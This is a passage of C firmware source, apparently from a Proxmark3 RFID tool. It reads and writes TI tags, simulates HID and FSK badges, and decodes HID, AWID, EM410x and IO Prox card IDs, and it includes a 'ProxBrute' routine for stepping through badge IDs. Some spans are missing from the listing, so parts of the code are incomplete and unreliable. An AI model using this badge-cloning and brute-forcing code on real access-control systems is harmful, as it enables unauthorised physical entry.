(shift3 << 8)) & 0x0ffff; 178 | 179 | // if r/w tag, check ident match 180 | if (shift3 & (1<<15) ) { 181 | DbpString("Info: TI tag is rewriteable"); 182 | // only 15 bits compare, last bit of ident is not valid 183 | if (((shift3 >> 16) ^ shift0) & 0x7fff ) { 184 | DbpString("Error: Ident mismatch!"); 185 | } else { 186 | DbpString("Info: TI tag ident is valid"); 187 | } 188 | } else { 189 | DbpString("Info: TI tag is readonly"); 190 | } 191 | 192 | // WARNING the order of the bytes in which we calc crc below needs checking 193 | // i'm 99% sure the crc algorithm is correct, but it may need to eat the 194 | // bytes in reverse or something 195 | // calculate CRC 196 | uint32_t crc=0; 197 | 198 | crc = update_crc16(crc, (shift0)&0xff); 199 | crc = update_crc16(crc, (shift0>>8)&0xff); 200 | crc = update_crc16(crc, (shift0>>16)&0xff); 201 | crc = update_crc16(crc, (shift0>>24)&0xff); 202 | crc = update_crc16(crc, (shift1)&0xff); 203 | crc = update_crc16(crc, (shift1>>8)&0xff); 204 | crc = update_crc16(crc, (shift1>>16)&0xff); 205 | crc = update_crc16(crc, (shift1>>24)&0xff); 206 | 207 | Dbprintf("Info: Tag data: %x%08x, crc=%x", 208 | (unsigned int)shift1, (unsigned int)shift0, (unsigned int)shift2 & 0xFFFF); 209 | if (crc != (shift2&0xffff)) { 210 | Dbprintf("Error: CRC mismatch, expected %x", (unsigned int)crc); 211 | } else { 212 | DbpString("Info: CRC is good"); 213 | } 214 | } 215 | } 216 | 217 | void WriteTIbyte(uint8_t b) 218 | { 219 | int i = 0; 220 | 221 | // modulate 8 bits out to the antenna 222 | for (i=0; i<8; i++) 223 | { 224 | if (b&(1<PIO_PDR = GPIO_SSC_DIN; 255 | AT91C_BASE_PIOA->PIO_ASR = GPIO_SSC_DIN; 256 | 257 | // steal this pin from the SSP and use it to control the modulation 258 | AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT; 259 | AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT; 260 | 261 | AT91C_BASE_SSC->SSC_CR = AT91C_SSC_SWRST; 262 | AT91C_BASE_SSC->SSC_CR = AT91C_SSC_RXEN | AT91C_SSC_TXEN; 263 | 264 | // Sample at 2 Mbit/s, so TI tags are 16.2 vs. 14.9 clocks long 265 | // 48/2 = 24 MHz clock must be divided by 12 266 | AT91C_BASE_SSC->SSC_CMR = 12; 267 | 268 | AT91C_BASE_SSC->SSC_RCMR = SSC_CLOCK_MODE_SELECT(0); 269 | AT91C_BASE_SSC->SSC_RFMR = SSC_FRAME_MODE_BITS_IN_WORD(32) | AT91C_SSC_MSBF; 270 | AT91C_BASE_SSC->SSC_TCMR = 0; 271 | AT91C_BASE_SSC->SSC_TFMR = 0; 272 | 273 | LED_D_ON(); 274 | 275 | // modulate antenna 276 | HIGH(GPIO_SSC_DOUT); 277 | 278 | // Charge TI tag for 50ms. 279 | SpinDelay(50); 280 | 281 | // stop modulating antenna and listen 282 | LOW(GPIO_SSC_DOUT); 283 | 284 | LED_D_OFF(); 285 | 286 | i = 0; 287 | for(;;) { 288 | if(AT91C_BASE_SSC->SSC_SR & AT91C_SSC_RXRDY) { 289 | BigBuf[i] = AT91C_BASE_SSC->SSC_RHR; // store 32 bit values in buffer 290 | i++; if(i >= TIBUFLEN) break; 291 | } 292 | WDT_HIT(); 293 | } 294 | 295 | // return stolen pin to SSP 296 | AT91C_BASE_PIOA->PIO_PDR = GPIO_SSC_DOUT; 297 | AT91C_BASE_PIOA->PIO_ASR = GPIO_SSC_DIN | GPIO_SSC_DOUT; 298 | 299 | char *dest = (char *)BigBuf_get_addr(); 300 | n = TIBUFLEN*32; 301 | // unpack buffer 302 | for (i=TIBUFLEN-1; i>=0; i--) { 303 | for (j=0; j<32; j++) { 304 | if(BigBuf[i] & (1 << j)) { 305 | dest[--n] = 1; 306 | } else { 307 | dest[--n] = -1; 308 | } 309 | } 310 | } 311 | } 312 | 313 | // arguments: 64bit data split into 32bit idhi:idlo and optional 16bit crc 314 | // if crc provided, it will be written with the data verbatim (even if bogus) 315 | // if not provided a valid crc will be computed from the data and written. 316 | void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc) 317 | { 318 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 319 | if(crc == 0) { 320 | crc = update_crc16(crc, (idlo)&0xff); 321 | crc = update_crc16(crc, (idlo>>8)&0xff); 322 | crc = update_crc16(crc, (idlo>>16)&0xff); 323 | crc = update_crc16(crc, (idlo>>24)&0xff); 324 | crc = update_crc16(crc, (idhi)&0xff); 325 | crc = update_crc16(crc, (idhi>>8)&0xff); 326 | crc = update_crc16(crc, (idhi>>16)&0xff); 327 | crc = update_crc16(crc, (idhi>>24)&0xff); 328 | } 329 | Dbprintf("Writing to tag: %x%08x, crc=%x", 330 | (unsigned int) idhi, (unsigned int) idlo, crc); 331 | 332 | // TI tags charge at 134.2Khz 333 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, 88); //134.8Khz 334 | // Place FPGA in passthrough mode, in this mode the CROSS_LO line 335 | // connects to SSP_DIN and the SSP_DOUT logic level controls 336 | // whether we're modulating the antenna (high) 337 | // or listening to the antenna (low) 338 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_PASSTHRU); 339 | LED_A_ON(); 340 | 341 | // steal this pin from the SSP and use it to control the modulation 342 | AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT; 343 | AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT; 344 | 345 | // writing algorithm: 346 | // a high bit consists of a field off for 1ms and field on for 1ms 347 | // a low bit consists of a field off for 0.3ms and field on for 1.7ms 348 | // initiate a charge time of 50ms (field on) then immediately start writing bits 349 | // start by writing 0xBB (keyword) and 0xEB (password) 350 | // then write 80 bits of data (or 64 bit data + 16 bit crc if you prefer) 351 | // finally end with 0x0300 (write frame) 352 | // all data is sent lsb firts 353 | // finish with 15ms programming time 354 | 355 | // modulate antenna 356 | HIGH(GPIO_SSC_DOUT); 357 | SpinDelay(50); // charge time 358 | 359 | WriteTIbyte(0xbb); // keyword 360 | WriteTIbyte(0xeb); // password 361 | WriteTIbyte( (idlo )&0xff ); 362 | WriteTIbyte( (idlo>>8 )&0xff ); 363 | WriteTIbyte( (idlo>>16)&0xff ); 364 | WriteTIbyte( (idlo>>24)&0xff ); 365 | WriteTIbyte( (idhi )&0xff ); 366 | WriteTIbyte( (idhi>>8 )&0xff ); 367 | WriteTIbyte( (idhi>>16)&0xff ); 368 | WriteTIbyte( (idhi>>24)&0xff ); // data hi to lo 369 | WriteTIbyte( (crc )&0xff ); // crc lo 370 | WriteTIbyte( (crc>>8 )&0xff ); // crc hi 371 | WriteTIbyte(0x00); // write frame lo 372 | WriteTIbyte(0x03); // write frame hi 373 | HIGH(GPIO_SSC_DOUT); 374 | SpinDelay(50); // programming time 375 | 376 | LED_A_OFF(); 377 | 378 | // get TI tag data into the buffer 379 | AcquireTiType(); 380 | 381 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 382 | DbpString("Now use `lf ti read` to check"); 383 | } 384 | 385 | void SimulateTagLowFrequency(int period, int gap, int ledcontrol) 386 | { 387 | int i; 388 | uint8_t *tab = BigBuf_get_addr(); 389 | 390 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 391 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT); 392 | 393 | AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT | GPIO_SSC_CLK; 394 | 395 | AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT; 396 | AT91C_BASE_PIOA->PIO_ODR = GPIO_SSC_CLK; 397 | 398 | #define SHORT_COIL() LOW(GPIO_SSC_DOUT) 399 | #define OPEN_COIL() HIGH(GPIO_SSC_DOUT) 400 | 401 | i = 0; 402 | for(;;) { 403 | //wait until SSC_CLK goes HIGH 404 | while(!(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK)) { 405 | if(BUTTON_PRESS() || (usb_poll_validate_length() )) { 406 | DbpString("Stopped"); 407 | return; 408 | } 409 | WDT_HIT(); 410 | } 411 | if (ledcontrol) 412 | LED_D_ON(); 413 | 414 | if(tab[i]) 415 | OPEN_COIL(); 416 | else 417 | SHORT_COIL(); 418 | 419 | if (ledcontrol) 420 | LED_D_OFF(); 421 | //wait until SSC_CLK goes LOW 422 | while(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK) { 423 | if(BUTTON_PRESS()) { 424 | DbpString("Stopped"); 425 | return; 426 | } 427 | WDT_HIT(); 428 | } 429 | 430 | i++; 431 | if(i == period) { 432 | 433 | i = 0; 434 | if (gap) { 435 | SHORT_COIL(); 436 | SpinDelayUs(gap); 437 | } 438 | } 439 | } 440 | } 441 | 442 | 443 | // ProxBrute - created this function so that i didnt mess with anything 444 | // important - needed to only send a set number of tags 445 | void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol) 446 | { 447 | int i; 448 | int x=0; 449 | uint8_t *tab = BigBuf_get_addr(); 450 | 451 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 452 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT); 453 | 454 | AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT | GPIO_SSC_CLK; 455 | 456 | AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT; 457 | AT91C_BASE_PIOA->PIO_ODR = GPIO_SSC_CLK; 458 | 459 | #define SHORT_COIL() LOW(GPIO_SSC_DOUT) 460 | #define OPEN_COIL() HIGH(GPIO_SSC_DOUT) 461 | 462 | i = 0; 463 | x = 0; 464 | for(;;) { 465 | while(!(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK)) { 466 | 467 | if(BUTTON_PRESS() || x == 20000 ) { 468 | DbpString("Stopped"); 469 | return; 470 | } 471 | WDT_HIT(); 472 | } 473 | 474 | if (ledcontrol) 475 | LED_D_ON(); 476 | 477 | if(tab[i]) 478 | OPEN_COIL(); 479 | else 480 | SHORT_COIL(); 481 | 482 | if (ledcontrol) 483 | LED_D_OFF(); 484 | 485 | while(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK) { 486 | if(BUTTON_PRESS() || x == 20000 ) { 487 | DbpString("Stopped"); 488 | return; 489 | } 490 | WDT_HIT(); 491 | } 492 | x++; 493 | i++; 494 | if(i == period) { 495 | i = 0; 496 | if (gap) { 497 | SHORT_COIL(); 498 | SpinDelayUs(gap); 499 | } 500 | } 501 | } 502 | } 503 | 504 | 505 | 506 | #define DEBUG_FRAME_CONTENTS 1 507 | void SimulateTagLowFrequencyBidir(int divisor, int t0) 508 | { 509 | } 510 | 511 | // compose fc/8 fc/10 waveform (FSK2) 512 | static void fc(int c, int *n) 513 | { 514 | uint8_t *dest = BigBuf_get_addr(); 515 | int idx; 516 | 517 | // for when we want an fc8 pattern every 4 logical bits 518 | if(c==0) { 519 | dest[((*n)++)]=1; 520 | dest[((*n)++)]=1; 521 | dest[((*n)++)]=1; 522 | dest[((*n)++)]=1; 523 | dest[((*n)++)]=0; 524 | dest[((*n)++)]=0; 525 | dest[((*n)++)]=0; 526 | dest[((*n)++)]=0; 527 | } 528 | 529 | // an fc/8 encoded bit is a bit pattern of 11110000 x6 = 48 samples 530 | if(c==8) { 531 | for (idx=0; idx<6; idx++) { 532 | dest[((*n)++)]=1; 533 | dest[((*n)++)]=1; 534 | dest[((*n)++)]=1; 535 | dest[((*n)++)]=1; 536 | dest[((*n)++)]=0; 537 | dest[((*n)++)]=0; 538 | dest[((*n)++)]=0; 539 | dest[((*n)++)]=0; 540 | } 541 | } 542 | 543 | // an fc/10 encoded bit is a bit pattern of 1111100000 x5 = 50 samples 544 | if(c==10) { 545 | for (idx=0; idx<5; idx++) { 546 | dest[((*n)++)]=1; 547 | dest[((*n)++)]=1; 548 | dest[((*n)++)]=1; 549 | dest[((*n)++)]=1; 550 | dest[((*n)++)]=1; 551 | dest[((*n)++)]=0; 552 | dest[((*n)++)]=0; 553 | dest[((*n)++)]=0; 554 | dest[((*n)++)]=0; 555 | dest[((*n)++)]=0; 556 | } 557 | } 558 | } 559 | // compose fc/X fc/Y waveform (FSKx) 560 | static void fcAll(uint8_t fc, int *n, uint8_t clock, uint16_t *modCnt) 561 | { 562 | uint8_t *dest = BigBuf_get_addr(); 563 | uint8_t halfFC = fc/2; 564 | uint8_t wavesPerClock = clock/fc; 565 | uint8_t mod = clock % fc; //modifier 566 | uint8_t modAdj = fc/mod; //how often to apply modifier 567 | bool modAdjOk = !(fc % mod); //if (fc % mod==0) modAdjOk=TRUE; 568 | // loop through clock - step field clock 569 | for (uint8_t idx=0; idx < wavesPerClock; idx++){ 570 | // put 1/2 FC length 1's and 1/2 0's per field clock wave (to create the wave) 571 | memset(dest+(*n), 0, fc-halfFC); //in case of odd number use extra here 572 | memset(dest+(*n)+(fc-halfFC), 1, halfFC); 573 | *n += fc; 574 | } 575 | if (mod>0) (*modCnt)++; 576 | if ((mod>0) && modAdjOk){ //fsk2 577 | if ((*modCnt % modAdj) == 0){ //if 4th 8 length wave in a rf/50 add extra 8 length wave 578 | memset(dest+(*n), 0, fc-halfFC); 579 | memset(dest+(*n)+(fc-halfFC), 1, halfFC); 580 | *n += fc; 581 | } 582 | } 583 | if (mod>0 && !modAdjOk){ //fsk1 584 | memset(dest+(*n), 0, mod-(mod/2)); 585 | memset(dest+(*n)+(mod-(mod/2)), 1, mod/2); 586 | *n += mod; 587 | } 588 | } 589 | 590 | // prepare a waveform pattern in the buffer based on the ID given then 591 | // simulate a HID tag until the button is pressed 592 | void CmdHIDsimTAG(int hi, int lo, int ledcontrol) 593 | { 594 | int n=0, i=0; 595 | /* 596 | HID tag bitstream format 597 | The tag contains a 44bit unique code. This is sent out MSB first in sets of 4 bits 598 | A 1 bit is represented as 6 fc8 and 5 fc10 patterns 599 | A 0 bit is represented as 5 fc10 and 6 fc8 patterns 600 | A fc8 is inserted before every 4 bits 601 | A special start of frame pattern is used consisting a0b0 where a and b are neither 0 602 | nor 1 bits, they are special patterns (a = set of 12 fc8 and b = set of 10 fc10) 603 | */ 604 | 605 | if (hi>0xFFF) { 606 | DbpString("Tags can only have 44 bits. - USE lf simfsk for larger tags"); 607 | return; 608 | } 609 | fc(0,&n); 610 | // special start of frame marker containing invalid bit sequences 611 | fc(8, &n); fc(8, &n); // invalid 612 | fc(8, &n); fc(10, &n); // logical 0 613 | fc(10, &n); fc(10, &n); // invalid 614 | fc(8, &n); fc(10, &n); // logical 0 615 | 616 | WDT_HIT(); 617 | // manchester encode bits 43 to 32 618 | for (i=11; i>=0; i--) { 619 | if ((i%4)==3) fc(0,&n); 620 | if ((hi>>i)&1) { 621 | fc(10, &n); fc(8, &n); // low-high transition 622 | } else { 623 | fc(8, &n); fc(10, &n); // high-low transition 624 | } 625 | } 626 | 627 | WDT_HIT(); 628 | // manchester encode bits 31 to 0 629 | for (i=31; i>=0; i--) { 630 | if ((i%4)==3) fc(0,&n); 631 | if ((lo>>i)&1) { 632 | fc(10, &n); fc(8, &n); // low-high transition 633 | } else { 634 | fc(8, &n); fc(10, &n); // high-low transition 635 | } 636 | } 637 | 638 | if (ledcontrol) 639 | LED_A_ON(); 640 | SimulateTagLowFrequency(n, 0, ledcontrol); 641 | 642 | if (ledcontrol) 643 | LED_A_OFF(); 644 | } 645 | 646 | // prepare a waveform pattern in the buffer based on the ID given then 647 | // simulate a FSK tag until the button is pressed 648 | // arg1 contains fcHigh and fcLow, arg2 contains invert and clock 649 | void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream) 650 | { 651 | int ledcontrol=1; 652 | int n=0, i=0; 653 | uint8_t fcHigh = arg1 >> 8; 654 | uint8_t fcLow = arg1 & 0xFF; 655 | uint16_t modCnt = 0; 656 | uint8_t clk = arg2 & 0xFF; 657 | uint8_t invert = (arg2 >> 8) & 1; 658 | 659 | for (i=0; i> 8) & 0xFF; 730 | uint8_t encoding = arg1 & 0xFF; 731 | uint8_t separator = arg2 & 1; 732 | uint8_t invert = (arg2 >> 8) & 1; 733 | 734 | if (encoding==2){ //biphase 735 | uint8_t phase=0; 736 | for (i=0; i> 8; 802 | uint8_t carrier = arg1 & 0xFF; 803 | uint8_t invert = arg2 & 0xFF; 804 | uint8_t curPhase = 0; 805 | for (i=0; i0xFFF) { 841 | DbpString("Tags can only have 44 bits."); 842 | return; 843 | } 844 | fc(0,&n); 845 | // special start of frame marker containing invalid bit sequences 846 | fc(8, &n); fc(8, &n); // invalid 847 | fc(8, &n); fc(10, &n); // logical 0 848 | fc(10, &n); fc(10, &n); // invalid 849 | fc(8, &n); fc(10, &n); // logical 0 850 | 851 | WDT_HIT(); 852 | // manchester encode bits 43 to 32 853 | for (i=11; i>=0; i--) { 854 | if ((i%4)==3) fc(0,&n); 855 | if ((hi>>i)&1) { 856 | fc(10, &n); fc(8, &n); // low-high transition 857 | } else { 858 | fc(8, &n); fc(10, &n); // high-low transition 859 | } 860 | } 861 | 862 | WDT_HIT(); 863 | // manchester encode bits 31 to 0 864 | for (i=31; i>=0; i--) { 865 | if ((i%4)==3) fc(0,&n); 866 | if ((lo>>i)&1) { 867 | fc(10, &n); fc(8, &n); // low-high transition 868 | } else { 869 | fc(8, &n); fc(10, &n); // high-low transition 870 | } 871 | } 872 | 873 | if (ledcontrol) 874 | LED_A_ON(); 875 | SimulateTagLowFrequencyProxBrute(n, 0, ledcontrol); 876 | 877 | if (ledcontrol) 878 | LED_A_OFF(); 879 | } 880 | 881 | 882 | 883 | // loop to get raw HID waveform then FSK demodulate the TAG ID from it 884 | void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) 885 | { 886 | uint8_t *dest = BigBuf_get_addr(); 887 | //const size_t sizeOfBigBuff = BigBuf_max_traceLen(); 888 | size_t size; 889 | uint32_t hi2=0, hi=0, lo=0; 890 | int idx=0; 891 | // Configure to go in 125Khz listen mode 892 | LFSetupFPGAForADC(95, true); 893 | 894 | //clear read buffer 895 | BigBuf_Clear_keep_EM(); 896 | 897 | while(!BUTTON_PRESS() && !usb_poll_validate_length()) { 898 | 899 | WDT_HIT(); 900 | if (ledcontrol) LED_A_ON(); 901 | 902 | DoAcquisition_default(-1,true); 903 | // FSK demodulator 904 | //size = sizeOfBigBuff; //variable size will change after demod so re initialize it before use 905 | size = 50*128*2; //big enough to catch 2 sequences of largest format 906 | idx = HIDdemodFSK(dest, &size, &hi2, &hi, &lo); 907 | 908 | if (idx>0 && lo>0 && (size==96 || size==192)){ 909 | // go over previously decoded manchester data and decode into usable tag ID 910 | if (hi2 != 0){ //extra large HID tags 88/192 bits 911 | Dbprintf("TAG ID: %x%08x%08x (%d)", 912 | (unsigned int) hi2, (unsigned int) hi, (unsigned int) lo, (unsigned int) (lo>>1) & 0xFFFF); 913 | }else { //standard HID tags 44/96 bits 914 | //Dbprintf("TAG ID: %x%08x (%d)",(unsigned int) hi, (unsigned int) lo, (unsigned int) (lo>>1) & 0xFFFF); //old print cmd 915 | uint8_t bitlen = 0; 916 | uint32_t fc = 0; 917 | uint32_t cardnum = 0; 918 | if (((hi>>5)&1) == 1){//if bit 38 is set then < 37 bit format is used 919 | uint32_t lo2=0; 920 | lo2=(((hi & 31) << 12) | (lo>>20)); //get bits 21-37 to check for format len bit 921 | uint8_t idx3 = 1; 922 | while(lo2 > 1){ //find last bit set to 1 (format len bit) 923 | lo2=lo2 >> 1; 924 | idx3++; 925 | } 926 | bitlen = idx3+19; 927 | fc =0; 928 | cardnum=0; 929 | if(bitlen == 26){ 930 | cardnum = (lo>>1)&0xFFFF; 931 | fc = (lo>>17)&0xFF; 932 | } 933 | if(bitlen == 37){ 934 | cardnum = (lo>>1)&0x7FFFF; 935 | fc = ((hi&0xF)<<12)|(lo>>20); 936 | } 937 | if(bitlen == 34){ 938 | cardnum = (lo>>1)&0xFFFF; 939 | fc= ((hi&1)<<15)|(lo>>17); 940 | } 941 | if(bitlen == 35){ 942 | cardnum = (lo>>1)&0xFFFFF; 943 | fc = ((hi&1)<<11)|(lo>>21); 944 | } 945 | } 946 | else { //if bit 38 is not set then 37 bit format is used 947 | bitlen= 37; 948 | fc =0; 949 | cardnum=0; 950 | if(bitlen==37){ 951 | cardnum = (lo>>1)&0x7FFFF; 952 | fc = ((hi&0xF)<<12)|(lo>>20); 953 | } 954 | } 955 | //Dbprintf("TAG ID: %x%08x (%d)", 956 | // (unsigned int) hi, (unsigned int) lo, (unsigned int) (lo>>1) & 0xFFFF); 957 | Dbprintf("TAG ID: %x%08x (%d) - Format Len: %dbit - FC: %d - Card: %d", 958 | (unsigned int) hi, (unsigned int) lo, (unsigned int) (lo>>1) & 0xFFFF, 959 | (unsigned int) bitlen, (unsigned int) fc, (unsigned int) cardnum); 960 | } 961 | if (findone){ 962 | if (ledcontrol) LED_A_OFF(); 963 | *high = hi; 964 | *low = lo; 965 | return; 966 | } 967 | // reset 968 | } 969 | hi2 = hi = lo = idx = 0; 970 | WDT_HIT(); 971 | } 972 | DbpString("Stopped"); 973 | if (ledcontrol) LED_A_OFF(); 974 | } 975 | 976 | // loop to get raw HID waveform then FSK demodulate the TAG ID from it 977 | void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) 978 | { 979 | uint8_t *dest = BigBuf_get_addr(); 980 | size_t size; 981 | int idx=0; 982 | //clear read buffer 983 | BigBuf_Clear_keep_EM(); 984 | // Configure to go in 125Khz listen mode 985 | LFSetupFPGAForADC(95, true); 986 | 987 | while(!BUTTON_PRESS() && !usb_poll_validate_length()) { 988 | 989 | WDT_HIT(); 990 | if (ledcontrol) LED_A_ON(); 991 | 992 | DoAcquisition_default(-1,true); 993 | // FSK demodulator 994 | size = 50*128*2; //big enough to catch 2 sequences of largest format 995 | idx = AWIDdemodFSK(dest, &size); 996 | 997 | if (idx<=0 || size!=96) continue; 998 | // Index map 999 | // 0 10 20 30 40 50 60 1000 | // | | | | | | | 1001 | // 01234567 890 1 234 5 678 9 012 3 456 7 890 1 234 5 678 9 012 3 456 7 890 1 234 5 678 9 012 3 - to 96 1002 | // ----------------------------------------------------------------------------- 1003 | // 00000001 000 1 110 1 101 1 011 1 101 1 010 0 000 1 000 1 010 0 001 0 110 1 100 0 000 1 000 1 1004 | // premable bbb o bbb o bbw o fff o fff o ffc o ccc o ccc o ccc o ccc o ccc o wxx o xxx o xxx o - to 96 1005 | // |---26 bit---| |-----117----||-------------142-------------| 1006 | // b = format bit len, o = odd parity of last 3 bits 1007 | // f = facility code, c = card number 1008 | // w = wiegand parity 1009 | // (26 bit format shown) 1010 | 1011 | //get raw ID before removing parities 1012 | uint32_t rawLo = bytebits_to_byte(dest+idx+64,32); 1013 | uint32_t rawHi = bytebits_to_byte(dest+idx+32,32); 1014 | uint32_t rawHi2 = bytebits_to_byte(dest+idx,32); 1015 | 1016 | size = removeParity(dest, idx+8, 4, 1, 88); 1017 | if (size != 66) continue; 1018 | // ok valid card found! 1019 | 1020 | // Index map 1021 | // 0 10 20 30 40 50 60 1022 | // | | | | | | | 1023 | // 01234567 8 90123456 7890123456789012 3 456789012345678901234567890123456 1024 | // ----------------------------------------------------------------------------- 1025 | // 00011010 1 01110101 0000000010001110 1 000000000000000000000000000000000 1026 | // bbbbbbbb w ffffffff cccccccccccccccc w xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 1027 | // |26 bit| |-117--| |-----142------| 1028 | // b = format bit len, o = odd parity of last 3 bits 1029 | // f = facility code, c = card number 1030 | // w = wiegand parity 1031 | // (26 bit format shown) 1032 | 1033 | uint32_t fc = 0; 1034 | uint32_t cardnum = 0; 1035 | uint32_t code1 = 0; 1036 | uint32_t code2 = 0; 1037 | uint8_t fmtLen = bytebits_to_byte(dest,8); 1038 | if (fmtLen==26){ 1039 | fc = bytebits_to_byte(dest+9, 8); 1040 | cardnum = bytebits_to_byte(dest+17, 16); 1041 | code1 = bytebits_to_byte(dest+8,fmtLen); 1042 | Dbprintf("AWID Found - BitLength: %d, FC: %d, Card: %d - Wiegand: %x, Raw: %08x%08x%08x", fmtLen, fc, cardnum, code1, rawHi2, rawHi, rawLo); 1043 | } else { 1044 | cardnum = bytebits_to_byte(dest+8+(fmtLen-17), 16); 1045 | if (fmtLen>32){ 1046 | code1 = bytebits_to_byte(dest+8,fmtLen-32); 1047 | code2 = bytebits_to_byte(dest+8+(fmtLen-32),32); 1048 | Dbprintf("AWID Found - BitLength: %d -unknown BitLength- (%d) - Wiegand: %x%08x, Raw: %08x%08x%08x", fmtLen, cardnum, code1, code2, rawHi2, rawHi, rawLo); 1049 | } else{ 1050 | code1 = bytebits_to_byte(dest+8,fmtLen); 1051 | Dbprintf("AWID Found - BitLength: %d -unknown BitLength- (%d) - Wiegand: %x, Raw: %08x%08x%08x", fmtLen, cardnum, code1, rawHi2, rawHi, rawLo); 1052 | } 1053 | } 1054 | if (findone){ 1055 | if (ledcontrol) LED_A_OFF(); 1056 | return; 1057 | } 1058 | // reset 1059 | idx = 0; 1060 | WDT_HIT(); 1061 | } 1062 | DbpString("Stopped"); 1063 | if (ledcontrol) LED_A_OFF(); 1064 | } 1065 | 1066 | void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) 1067 | { 1068 | uint8_t *dest = BigBuf_get_addr(); 1069 | 1070 | size_t size=0, idx=0; 1071 | int clk=0, invert=0, errCnt=0, maxErr=20; 1072 | uint32_t hi=0; 1073 | uint64_t lo=0; 1074 | //clear read buffer 1075 | BigBuf_Clear_keep_EM(); 1076 | // Configure to go in 125Khz listen mode 1077 | LFSetupFPGAForADC(95, true); 1078 | 1079 | while(!BUTTON_PRESS() && !usb_poll_validate_length()) { 1080 | 1081 | WDT_HIT(); 1082 | if (ledcontrol) LED_A_ON(); 1083 | 1084 | DoAcquisition_default(-1,true); 1085 | size = BigBuf_max_traceLen(); 1086 | //askdemod and manchester decode 1087 | if (size > 16385) size = 16385; //big enough to catch 2 sequences of largest format 1088 | errCnt = askdemod(dest, &size, &clk, &invert, maxErr, 0, 1); 1089 | WDT_HIT(); 1090 | 1091 | if (errCnt<0) continue; 1092 | 1093 | errCnt = Em410xDecode(dest, &size, &idx, &hi, &lo); 1094 | if (errCnt){ 1095 | if (size>64){ 1096 | Dbprintf("EM XL TAG ID: %06x%08x%08x - (%05d_%03d_%08d)", 1097 | hi, 1098 | (uint32_t)(lo>>32), 1099 | (uint32_t)lo, 1100 | (uint32_t)(lo&0xFFFF), 1101 | (uint32_t)((lo>>16LL) & 0xFF), 1102 | (uint32_t)(lo & 0xFFFFFF)); 1103 | } else { 1104 | Dbprintf("EM TAG ID: %02x%08x - (%05d_%03d_%08d)", 1105 | (uint32_t)(lo>>32), 1106 | (uint32_t)lo, 1107 | (uint32_t)(lo&0xFFFF), 1108 | (uint32_t)((lo>>16LL) & 0xFF), 1109 | (uint32_t)(lo & 0xFFFFFF)); 1110 | } 1111 | 1112 | if (findone){ 1113 | if (ledcontrol) LED_A_OFF(); 1114 | *high=lo>>32; 1115 | *low=lo & 0xFFFFFFFF; 1116 | return; 1117 | } 1118 | } 1119 | WDT_HIT(); 1120 | hi = lo = size = idx = 0; 1121 | clk = invert = errCnt = 0; 1122 | } 1123 | DbpString("Stopped"); 1124 | if (ledcontrol) LED_A_OFF(); 1125 | } 1126 | 1127 | void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol) 1128 | { 1129 | uint8_t *dest = BigBuf_get_addr(); 1130 | int idx=0; 1131 | uint32_t code=0, code2=0; 1132 | uint8_t version=0; 1133 | uint8_t facilitycode=0; 1134 | uint16_t number=0; 1135 | //clear read buffer 1136 | BigBuf_Clear_keep_EM(); 1137 | // Configure to go in 125Khz listen mode 1138 | LFSetupFPGAForADC(95, true); 1139 | 1140 | while(!BUTTON_PRESS() && !usb_poll_validate_length()) { 1141 | WDT_HIT(); 1142 | if (ledcontrol) LED_A_ON(); 1143 | DoAcquisition_default(-1,true); 1144 | //fskdemod and get start index 1145 | WDT_HIT(); 1146 | idx = IOdemodFSK(dest, BigBuf_max_traceLen()); 1147 | if (idx<0) continue; 1148 | //valid tag found 1149 | 1150 | //Index map 1151 | //0 10 20 30 40 50 60 1152 | //| | | | | | | 1153 | //01234567 8 90123456 7 89012345 6 78901234 5 67890123 4 56789012 3 45678901 23 1154 | //----------------------------------------------------------------------------- 1155 | //00000000 0 11110000 1 facility 1 version* 1 code*one 1 code*two 1 ???????? 11 1156 | // 1157 | //XSF(version)facility:codeone+codetwo 1158 | //Handle the data 1159 | if(findone){ //only print binary if we are doing one 1160 | Dbprintf("%d%d%d%d%d%d%d%d %d",dest[idx], dest[idx+1], dest[idx+2],dest[idx+3],dest[idx+4],dest[idx+5],dest[idx+6],dest[idx+7],dest[idx+8]); 1161 | Dbprintf("%d%d%d%d%d%d%d%d %d",dest[idx+9], dest[idx+10],dest[idx+11],dest[idx+12],dest[idx+13],dest[idx+14],dest[idx+15],dest[idx+16],dest[idx+17]); 1162 | Dbprintf("%d%d%d%d%d%d%d%d %d",dest[idx+18],dest[idx+19],dest[idx+20],dest[idx+21],dest[idx+22],dest[idx+23],dest[idx+24],dest[idx+25],dest[idx+26]); 1163 | Dbprintf("%d%d%d%d%d%d%d%d %d",dest[idx+27],dest[idx+28],dest[idx+29],dest[idx+30],dest[idx+31],dest[idx+32],dest[idx+33],dest[idx+34],dest[idx+35]); 1164 | Dbprintf("%d%d%d%d%d%d%d%d %d",dest[idx+36],dest[idx+37],dest[idx+38],dest[idx+39],dest[idx+40],dest[idx+41],dest[idx+42],dest[idx+43],dest[idx+44]); 1165 | Dbprintf("%d%d%d%d%d%d%d%d 